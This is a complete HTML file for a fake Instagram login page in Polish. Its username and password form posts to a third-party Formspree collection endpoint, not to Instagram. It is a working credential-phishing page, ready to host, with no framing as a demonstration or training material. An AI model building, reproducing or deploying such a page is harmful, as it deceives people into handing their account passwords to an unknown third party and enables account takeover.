<!DOCTYPE html>
<html lang="pl">
<head>
  <meta charset="UTF-8">
  <title>Instagram Login</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      background-color: #fafafa;
    }
    .login-container {
      background-color: white;
      padding: 40px;
      box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
      width: 300px;
      border-radius: 5px;
    }
    .login-container h2 {
      text-align: center;
      margin-bottom: 20px;
    }
    .login-container input {
      width: 100%;
      padding: 10px;
      margin: 10px 0;
      border: 1px solid #ccc;
      border-radius: 5px;
    }
    .login-container button {
      width: 100%;
      padding: 10px;
      background-color: #3897f0;
      color: white;
      border: none;
      border-radius: 5px;
      cursor: pointer;
    }
    .login-container button:hover {
      background-color: #3e95f4;
    }
  </style>
</head>
<body>

  <div class="login-container">
    <h2>Instagram</h2>
    <form action="https://formspree.io/f/mjkydrny" method="POST">
      <label for="username">Nazwa użytkownika:</label>
      <input type="text" id="username" name="username" required>
      
      <label for="password">Hasło:</label>
      <input type="password" id="password" name="password" required>
      
      <button type="submit">Zaloguj się</button>
    </form>
  </div>

</body>
</html>
